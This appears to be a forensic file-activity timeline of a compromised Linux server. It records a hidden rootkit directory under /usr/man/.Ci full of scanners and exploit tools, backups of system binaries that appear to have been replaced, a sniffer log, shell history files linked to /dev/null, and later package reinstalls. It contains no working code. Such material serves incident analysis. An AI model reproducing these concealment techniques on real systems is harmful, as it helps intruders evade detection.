                      12716 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/amdx

                      13023 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/ben

                       1455 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/ben.c

                      15667 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/pscan

                       4442 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/amd/pscan.c

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/bind

                       1760 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/bind/ibind.sh

                       3980 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/bind/pscan.c

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/daemon

                       5907 ..c -rw------- 1010     users    /usr/man/.Ci/scan/daemon/lscan2.c

                      12392 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/daemon/z0ne

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/port

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/port/strobe

                        171 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/INSTALL

                       1187 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/Makefile

                         17 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/VERSION

                       3296 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.1

                      17364 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.c

                      39950 ..c -rw------- 1010     users    /usr/man/.Ci/scan/port/strobe/strobe.services

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/statd

                       4390 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/classb

                      19140 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/r

                      21800 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/statd/statdx

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/wu

                      26676 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/wu/fs

                      37760 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/wu/wu

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/scan/x

                      15092 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/pscan

                       3980 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/scan/x/pscan.c

                      17969 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/x

                       1259 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/xfil

                        385 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/scan/x/xscan

                       3098 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/snap

                       5324 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/sp.pl

                     350996 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/syslogd

Nov 08 00 06:51:56     4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/

                        118 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/ /Anap

                      12408 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/addn

                         83 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/addps

                    1052024 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/bx

                        699 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/chmod-it

                        328 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/do

                     185988 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/find

                      18535 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/fix

                        156 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/needz

                       4096 ..c drwxr-xr-x 1010     users    /usr/man/.Ci/paki

                       8524 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/paki/slice2

                       6793 ..c -rw-r--r-- 1010     users    /usr/man/.Ci/paki/stream.c

                        188 ..c -rwxr-xr-x 1010     users    /usr/man/.Ci/rmS

Nov 08 00 06:52:09        9 m.c lrwxrwxrwx root     root     /.bash_history -> /dev/null

                          9 m.c lrwxrwxrwx root     root     /root/.bash_history -> /dev/null

                          9 m.c lrwxrwxrwx root     root     /tmp/.bash_history -> /dev/null

                       4096 m.c drwxr-xr-x root     root     /usr/games

                          9 mac lrwxrwxrwx root     root     /usr/games/.bash_history -> /dev/null

                       4096 mac drwxr-xr-x root     root     /usr/man/.Ci/backup

                      42736 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/ifconfig

                      43024 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/ls

                      66736 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/netstat

                      60080 mac -r-xr-xr-x root     root     /usr/man/.Ci/backup/ps

                      23568 mac -rwxr-xr-x root     root     /usr/man/.Ci/backup/tcpd

                      34896 mac -r-xr-xr-x root     root     /usr/man/.Ci/backup/top

Nov 08 00 06:52:12     4096 m.c drwxr-xr-x root     root     /usr/man

                        102 mac -rw-r--r-- root     root     /usr/man/.a

                         58 mac -rw-r--r-- root     root     /usr/man/.p

                         58 mac -rw-r--r-- root     root     /usr/man/p

                         61 m.c -rw-r--r-- root     root     /usr/man/r

                          5 mac -rw-r--r-- root     root     /usr/man/.Ci/sniff.pid

                          0 mac -rw-r--r-- root     root     /usr/man/.Ci/tcp.log

Nov 08 00 06:52:15      171 ..c -rw-r--r-- 1010     users    /dev/ptyp

Nov 08 00 06:52:25     1024 ..c drwxr-xr-x root     root     /.automount

                        670 ..c -rw------- root     root     /etc/amd.conf

                        105 ..c -rw-r----- root     root     /etc/amd.net

                        766 ..c -rwxr-xr-x root     root     /etc/rc.d/init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/sysconfig

                         56 ..c -rwxr-xr-x root     root     /etc/sysconfig/amd

                       8024 ..c -rwxr-xr-x root     root     /usr/bin/pawd

                       9084 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/AUTHORS

                       3933 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/BUGS

                     147946 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/ChangeLog

                      23786 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/NEWS

                       3817 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README

                       4113 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README.autofs

                       1225 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/README.y2k

                     621985 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/am-utils.ps

                       3201 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/amd.conf-sample

                       4096 m.c drwxr-xr-x root     root     /usr/doc/am-utils-6.0.1s11

                     189318 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/hlfsd.ps

                       3006 ..c -rw-r--r-- root     root     /usr/doc/am-utils-6.0.1s11/lostaltmail.conf-sample

                      15625 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-1.gz

                      15324 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-2.gz

                      14152 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-3.gz

                      13984 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-4.gz

                      15354 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-5.gz

                       5011 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-6.gz

                       7086 ..c -rw-r--r-- root     root     /usr/info/am-utils.info-7.gz

                       2954 ..c -rw-r--r-- root     root     /usr/info/am-utils.info.gz

                       8192 m.c drwxr-xr-x root     root     /usr/lib

                         15 m.c lrwxrwxrwx root     root     /usr/lib/libamu.so -> libamu.so.2.1.1

                         15 m.c lrwxrwxrwx root     root     /usr/lib/libamu.so.2 -> libamu.so.2.1.1

                      40370 ..c -rwxr-xr-x root     root     /usr/lib/libamu.so.2.1.1

                       3026 ..c -rw-r--r-- root     root     /usr/man/man1/pawd.1

                      19031 ..c -rw-r--r-- root     root     /usr/man/man5/amd.conf.5

                      10003 ..c -rw-r--r-- root     root     /usr/man/man8/amd.8

                       6318 ..c -rw-r--r-- root     root     /usr/man/man8/amq.8

                       3784 ..c -rw-r--r-- root     root     /usr/man/man8/automount2amd.8

                       5453 ..c -rw-r--r-- root     root     /usr/man/man8/fixmount.8

                       2818 ..c -rw-r--r-- root     root     /usr/man/man8/fsinfo.8

                       9641 ..c -rw-r--r-- root     root     /usr/man/man8/hlfsd.8

                       2571 ..c -rw-r--r-- root     root     /usr/man/man8/mk-amd-map.8

                       2806 ..c -rw-r--r-- root     root     /usr/man/man8/wire-test.8

                       1043 ..c -rwxr-xr-x root     root     /usr/sbin/am-eject

                     106640 ..c -rwxr-xr-x root     root     /usr/sbin/amd

                       1392 ..c -rwxr-xr-x root     root     /usr/sbin/amd2ldif

                       1003 ..c -rwxr-xr-x root     root     /usr/sbin/amd2sun

                      13892 ..c -rwxr-xr-x root     root     /usr/sbin/amq

                       2257 ..c -rwxr-xr-x root     root     /usr/sbin/automount2amd

                       2170 ..c -rwxr-xr-x root     root     /usr/sbin/ctl-hlfsd

                       1521 ..c -rwxr-xr-x root     root     /usr/sbin/fix-amd-map

                      10808 ..c -rwxr-xr-x root     root     /usr/sbin/fixmount

                        404 ..c -rwxr-xr-x root     root     /usr/sbin/fixrmtab

                      34784 ..c -rwxr-xr-x root     root     /usr/sbin/fsinfo

                      29656 ..c -rwxr-xr-x root     root     /usr/sbin/hlfsd

                      18412 ..c -rwxr-xr-x root     root     /usr/sbin/lostaltmail

                       7588 ..c -rwxr-xr-x root     root     /usr/sbin/mk-amd-map

                        804 ..c -rwxr-xr-x root     root     /usr/sbin/wait4amd

                        965 ..c -rwxr-xr-x root     root     /usr/sbin/wait4amd2die

                       5140 ..c -rwxr-xr-x root     root     /usr/sbin/wire-test

Nov 08 00 06:52:31    12333 m.c -rw-r--r-- root     root     /etc/ld.so.cache

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc0.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc0.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc1.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc1.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc2.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc2.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc3.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc3.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc4.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc4.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc5.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc5.d/K28amd -> ../init.d/amd

                       1024 m.c drwxr-xr-x root     root     /etc/rc.d/rc6.d

                         13 mac lrwxrwxrwx root     root     /etc/rc.d/rc6.d/K28amd -> ../init.d/amd

Nov 08 00 06:52:32     1176 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc0.d/K60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc1.d/K60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc2.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc3.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc5.d/S60lpd -> ../init.d/lpd

                         13 .ac lrwxrwxrwx root     root     /etc/rc.d/rc6.d/K60lpd -> ../init.d/lpd

                       3564 ..c -r--r--r-- root     root     /etc/screenrc

                       1024 m.c drwxr-xr-x root     root     /etc/skel

                       3394 ..c -rw-r--r-- root     root     /etc/skel/.screenrc

                          4 .ac lrwxrwxrwx root     root     /usr/bin/gmake -> make

                      15816 ..c -r-xr-xr-x root     lp       /usr/bin/lpq

                      15608 ..c -r-xr-xr-x root     lp       /usr/bin/lpr

                      16248 ..c -r-xr-xr-x root     lp       /usr/bin/lprm

                       3656 ..c -rwxr-xr-x root     root     /usr/bin/lptest

                     104316 ..c -rwxr-xr-x root     root     /usr/bin/make

                       4096 m.c drwxr-xr-x root     root     /usr/doc/make-3.77

                      26571 ..c -rw-r--r-- root     root     /usr/doc/make-3.77/NEWS

                       2141 ..c -r--r--r-- root     root     /usr/doc/make-3.77/README

                      14727 ..c -rw-r--r-- root     root     /usr/info/make.info-1.gz

                       1928 ..c -rw-r--r-- root     root     /usr/info/make.info-10.gz

                      15693 ..c -rw-r--r-- root     root     /usr/info/make.info-2.gz

                      15515 ..c -rw-r--r-- root     root     /usr/info/make.info-3.gz

                      15275 ..c -rw-r--r-- root     root     /usr/info/make.info-4.gz

                      15324 ..c -rw-r--r-- root     root     /usr/info/make.info-5.gz

                      15459 ..c -rw-r--r-- root     root     /usr/info/make.info-6.gz

                      14989 ..c -rw-r--r-- root     root     /usr/info/make.info-7.gz

                       5385 ..c -rw-r--r-- root     root     /usr/info/make.info-8.gz

                       7253 ..c -rw-r--r-- root     root     /usr/info/make.info-9.gz

                       2111 .ac -rw-r--r-- root     root     /usr/info/make.info.gz

                       4650 ..c -rwxr-xr-x root     root     /usr/man/man1/lpq.1

                       7458 ..c -rw-r--r-- root     root     /usr/man/man1/lpr.1

                       4633 ..c -rw-r--r-- root     root     /usr/man/man1/lprm.1

                       2861 ..c -rw-r--r-- root     root     /usr/man/man1/lptest.1

                       7598 ..c -rw-r--r-- root     root     /usr/man/man1/make.1

                       7845 ..c -rw-r--r-- root     root     /usr/man/man5/printcap.5

                       5907 ..c -rw-r--r-- root     root     /usr/man/man8/lpc.8

                       7422 ..c -rw-r--r-- root     root     /usr/man/man8/lpd.8

                       3857 ..c -rw-r--r-- root     root     /usr/man/man8/pac.8

                      24104 ..c -rwxr-Sr-x root     lp       /usr/sbin/lpc

                      51740 ..c -rwxr--r-- root     root     /usr/sbin/lpd

                       5140 ..c -rwxr-xr-x root     root     /usr/sbin/lpf

                       9412 ..c -rwxr--r-- root     root     /usr/sbin/pac

                       1024 ..c drwxrwxr-x root     daemon   /var/spool/lpd

Nov 08 00 06:52:33     2048 m.c drwxr-xr-x root     root     /bin

                       1024 m.c drwxr-xr-x root     root     /etc/X11

                       1024 m.c drwxr-xr-x root     root     /etc/X11/applnk/Internet

                       1024 mac drwxr-xr-x root     root     /etc/X11/wmconfig

                        114 ..c -rw-r--r-- root     root     /etc/X11/wmconfig/telnet

                      13281 mac -rw-r--r-- root     root     /etc/info-dir

                       1084 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/yppasswdd

                       1137 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/ypserv

                       1398 ..c -rw-r--r-- root     root     /etc/ypserv.conf

                     236468 ..c -rwxr-xr-x root     root     /usr/bin/screen

                      64608 ..c -rwxr-xr-x root     root     /usr/bin/telnet

                       4096 m.c drwxr-xr-x root     root     /usr/doc/screen-3.9.4

                      14081 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/FAQ

                       3619 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/NEWS

                       3437 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/README

                       6447 ..c -rw-r--r-- root     root     /usr/doc/screen-3.9.4/README.DOTSCREEN

                       4096 m.c drwxr-xr-x root     root     /usr/doc/ypserv-1.3.9

                        191 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/BUGS

                      34068 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/ChangeLog

                       6037 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/INSTALL

                       2471 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/NEWS

                       3595 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README

                        259 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README.etc

                       2849 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/README.secure

                        286 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/TODO

                        471 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/securenets

                       1398 ..c -rw-r--r-- root     root     /usr/doc/ypserv-1.3.9/ypserv.conf

                       4096 m.c drwxr-xr-x root     root     /usr/include/rpcsvc

                       7242 ..c -rw-r--r-- root     root     /usr/include/rpcsvc/ypxfrd.x

                       8192 m.c drwxr-xr-x root     root     /usr/info

                      16094 ..c -rw-r--r-- root     root     /usr/info/screen.info-1.gz

                      15113 ..c -rw-r--r-- root     root     /usr/info/screen.info-2.gz

                      16847 ..c -rw-r--r-- root     root     /usr/info/screen.info-3.gz

                      12505 ..c -rw-r--r-- root     root     /usr/info/screen.info-4.gz

                       1978 .ac -rw-r--r-- root     root     /usr/info/screen.info.gz

                       4096 m.c drwxr-xr-x root     root     /usr/lib/yp

                       1361 ..c -rwxr-xr-x root     root     /usr/lib/yp/create_printcap

                      12384 ..c -rwxr-xr-x root     root     /usr/lib/yp/makedbm

                         95 ..c -rwxr-xr-x root     root     /usr/lib/yp/match_printcap

                      10244 ..c -rwxr-xr-x root     root     /usr/lib/yp/mknetid

                       2295 ..c -rwxr-xr-x root     root     /usr/lib/yp/pwupdate

                      10004 ..c -rwxr-xr-x root     root     /usr/lib/yp/revnetgroup

                      10884 ..c -rwxr-xr-x root     root     /usr/lib/yp/yphelper

                       4110 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypinit

                      19272 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr

                        329 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_1perday

                        246 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_1perhour

                        260 ..c -rwxr-xr-x root     root     /usr/lib/yp/ypxfr_2perday

                     129824 ..c -rw-r--r-- root     root     /usr/man/man1/screen.1

                      32150 ..c -rw-r--r-- root     root     /usr/man/man1/telnet.1

                       1002 ..c -rw-r--r-- root     root     /usr/man/man5/issue.net.5

                       1914 ..c -rw-r--r-- root     root     /usr/man/man5/netgroup.5

                       2739 ..c -rw-r--r-- root     root     /usr/man/man5/ypserv.conf.5

                      12823 ..c -rw-r--r-- root     root     /usr/man/man8/in.telnetd.8

                       2112 ..c -rw-r--r-- root     root     /usr/man/man8/makedbm.8

                       2492 ..c -rw-r--r-- root     root     /usr/man/man8/mknetid.8

                        678 ..c -rw-r--r-- root     root     /usr/man/man8/pwupdate.8

                        592 ..c -rw-r--r-- root     root     /usr/man/man8/revnetgroup.8

                       6962 ..c -rw-r--r-- root     root     /usr/man/man8/rpc.yppasswdd.8

                       4004 ..c -rw-r--r-- root     root     /usr/man/man8/rpc.ypxfrd.8

                         12 mac lrwxrwxrwx root     root     /usr/man/man8/telnetd.8 -> in.telnetd.8

                       1593 ..c -rw-r--r-- root     root     /usr/man/man8/ypinit.8

                         25 ..c -rw-r--r-- root     root     /usr/man/man8/yppasswdd.8

                       2830 ..c -rw-r--r-- root     root     /usr/man/man8/yppush.8

                       4886 ..c -rw-r--r-- root     root     /usr/man/man8/ypserv.8

                       4320 ..c -rw-r--r-- root     root     /usr/man/man8/ypxfr.8

                         22 ..c -rw-r--r-- root     root     /usr/man/man8/ypxfrd.8

                      35628 ..c -rwxr-xr-x root     root     /usr/sbin/in.telnetd

                      18448 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.yppasswdd

                      25212 ..c -rwxr-xr-x root     root     /usr/sbin/rpc.ypxfrd

                      14520 ..c -rwxr-xr-x root     root     /usr/sbin/yppush

                      40476 ..c -rwxr-xr-x root     root     /usr/sbin/ypserv

                       1024 m.c drwxr-xr-x root     root     /var/yp

                      13843 ..c -rw-r--r-- root     root     /var/yp/Makefile

                        471 ..c -rw-r--r-- root     root     /var/yp/securenets

Nov 08 00 06:52:34  1052024 m.c -rwxr-xr-x root     root     /bin/bx

Nov 08 00 06:53:06     1024 m.c drwxr-x--- root     root     /root

                      12288 m.c -rw-rw-r-- root     root     /etc/psdevtab

                       1024 m.c drwxr-xr-x root     root     /root/.ssh

                        537 m.c -rw------- root     root     /etc/ssh_host_key

                        341 mac -rw-r--r-- root     root     /etc/ssh_host_key.pub

                        512 m.c -rw------- root     root     /root/.ssh/random_seed

Nov 08 00 06:53:11      880 m.c -rw-r--r-- root     root     /etc/ssh_config

                          3 mac lrwxrwxrwx root     root     /usr/local/bin/slogin -> ssh

                          4 mac lrwxrwxrwx root     root     /usr/local/bin/ssh -> ssh1

                         11 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-keygen -> ssh-keygen1

                     327262 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-keygen1

                     604938 mac -rws--x--x root     root     /usr/local/bin/ssh1

Nov 08 00 06:53:12       21 mac lrwxrwxrwx root     root     /usr/local/bin/make-ssh-known-hosts -> make-ssh-known-hosts1

                      21228 mac -rwxr-xr-x root     root     /usr/local/bin/make-ssh-known-hosts1

                          4 mac lrwxrwxrwx root     root     /usr/local/bin/scp -> scp1

                      90424 mac -rwxr-xr-x root     root     /usr/local/bin/scp1

                          8 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-add -> ssh-add1

                     337617 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-add1

                         10 mac lrwxrwxrwx root     root     /usr/local/bin/ssh-agent -> ssh-agent1

                     343586 mac -rwxr-xr-x root     root     /usr/local/bin/ssh-agent1

                          5 m.c lrwxrwxrwx root     root     /usr/local/sbin/sshd -> sshd1

                     643674 m.c -rwxr-xr-x root     root     /usr/local/sbin/sshd1

                        955 m.c -rwxr-xr-x root     root     /etc/rc.d/rc.local

                        684 m.c -rw-r--r-- root     root     /etc/sshd_config

                       4096 m.c drwxr-xr-x root     root     /usr/local/man/man1

                         23 mac lrwxrwxrwx root     root     /usr/local/man/man1/make-ssh-known-hosts.1 -> make-ssh-known-hosts1.1

                      12272 mac -rw-r--r-- root     root     /usr/local/man/man1/make-ssh-known-hosts1.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/scp.1 -> scp1.1

                       4892 mac -rw-r--r-- root     root     /usr/local/man/man1/scp1.1

                          5 mac lrwxrwxrwx root     root     /usr/local/man/man1/slogin.1 -> ssh.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/slogin1.1 -> ssh1.1

                         10 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-add.1 -> ssh-add1.1

                       4007 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-add1.1

                         12 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-agent.1 -> ssh-agent1.1

                       6265 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-agent1.1

                         13 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh-keygen.1 -> ssh-keygen1.1

                       5824 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh-keygen1.1

                          6 mac lrwxrwxrwx root     root     /usr/local/man/man1/ssh.1 -> ssh1.1

                      38572 mac -rw-r--r-- root     root     /usr/local/man/man1/ssh1.1

                       4096 m.c drwxr-xr-x root     root     /usr/local/man/man8

                          7 mac lrwxrwxrwx root     root     /usr/local/man/man8/sshd.8 -> sshd1.8

                      37023 mac -rw-r--r-- root     root     /usr/local/man/man8/sshd1.8

                          5 mac -rw-r--r-- root     root     /var/run/sshd.pid

Nov 08 00 06:53:40      484 ..c -rw------- root     root     /etc/ftpaccess

                        456 ..c -rw------- root     root     /etc/ftpconversions

                         39 ..c -rw------- root     root     /etc/ftpgroups

                        104 ..c -rw------- root     root     /etc/ftphosts

                         79 ..c -rw------- root     root     /etc/ftpusers

                       1024 m.c drwxr-xr-x root     root     /etc/logrotate.d

                         78 ..c -rw-r--r-- root     root     /etc/logrotate.d/ftpd

                       1024 m.c drwxr-xr-x root     root     /etc/pam.d

                        314 ..c -rw-r--r-- root     root     /etc/pam.d/ftp

                      16384 m.c drwxr-xr-x root     root     /usr/bin

                       8928 ..c -rwxr-xr-x bin      bin      /usr/bin/ftpcount

                       8928 ..c -rwxr-xr-x bin      bin      /usr/bin/ftpwho

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0

                     112149 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/CHANGES

                      11382 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS

                       2580 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/ERRATA

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO

                      28539 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT

                      18641 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO

                       3185 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/README

                       4396 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/TODO

                       4096 m.c drwxr-xr-x root     root     /usr/doc/wu-ftpd-2.6.0/examples

                        404 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpaccess

                       1866 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy

                        538 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions

                        137 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris

                         37 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpgroups

                        190 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftphosts

                        882 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpservers

                         83 ..c -rw-r--r-- root     root     /usr/doc/wu-ftpd-2.6.0/examples/ftpusers

                      16384 m.c drwxr-xr-x root     root     /usr/man/man1

                        701 ..c -rw-r--r-- root     root     /usr/man/man1/ftpcount.1.gz

                        702 ..c -rw-r--r-- root     root     /usr/man/man1/ftpwho.1.gz

                      14006 ..c -rw-r--r-- root     root     /usr/man/man5/ftpaccess.5.gz

                        857 ..c -rw-r--r-- root     root     /usr/man/man5/ftpconversions.5.gz

                        815 ..c -rw-r--r-- root     root     /usr/man/man5/ftphosts.5.gz

                       1635 ..c -rw-r--r-- root     root     /usr/man/man5/ftpservers.5.gz

                       1490 ..c -rw-r--r-- root     root     /usr/man/man5/xferlog.5.gz

                       5272 ..c -rw-r--r-- root     root     /usr/man/man8/ftpd.8.gz

                        846 ..c -rw-r--r-- root     root     /usr/man/man8/ftprestart.8.gz

                       1583 ..c -rw-r--r-- root     root     /usr/man/man8/ftpshut.8.gz

                       1350 ..c -rw-r--r-- root     root     /usr/man/man8/privatepw.8.gz

                       7792 ..c -rwxr-xr-x bin      bin      /usr/sbin/ckconfig

                       8112 ..c -rwxr-xr-x bin      bin      /usr/sbin/ftprestart

                      10800 ..c -rwxr-xr-x bin      bin      /usr/sbin/ftpshut

                     162608 ..c -rwxr-xr-x bin      bin      /usr/sbin/in.ftpd

                          7 .ac lrwxrwxrwx bin      bin      /usr/sbin/in.wuftpd -> in.ftpd

                      10448 ..c -rwxr-xr-x bin      bin      /usr/sbin/privatepw

                          7 .ac lrwxrwxrwx bin      bin      /usr/sbin/wu.ftpd -> in.ftpd

                      10438 ..c -rwxr-xr-x bin      bin      /usr/sbin/xferstats

Nov 08 00 06:53:49     1024 m.c drwxr-xr-x root     root     /etc/rc.d/init.d

                       2257 .ac -rwxr-xr-x root     root     /etc/rc.d/init.d/nfs

                       1722 ..c -rwxr-xr-x root     root     /etc/rc.d/init.d/nfslock

                       3072 m.c drwxr-xr-x root     root     /sbin

                       2848 ..c -rwxr-xr-x root     root     /sbin/rpc.lockd

                      19888 ..c -rwxr-xr-x root     root     /sbin/rpc.statd

                       6960 ..c -rwxr-xr-x root     root     /sbin/rpcdebug

                       4096 m.c drwxr-xr-x root     root     /usr/doc

                       4096 m.c drwxr-xr-x root     root     /usr/doc/nfs-utils-0.1.9.1

                       2397 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/ChangeLog

                        563 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/INSTALL

                       1058 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/KNOWNBUGS

                      10337 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/NEW

                       2305 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/README

                        291 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/THANKS

                       4517 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/TODO

                       3882 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/index.html

                       3882 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/nfs.html

                     186037 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/nfs.ps

                       2626 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node1.html

                       3254 ..c -rw-r--r-- root     root     /usr/doc/nfs-utils-0.1.9.1/node10.html

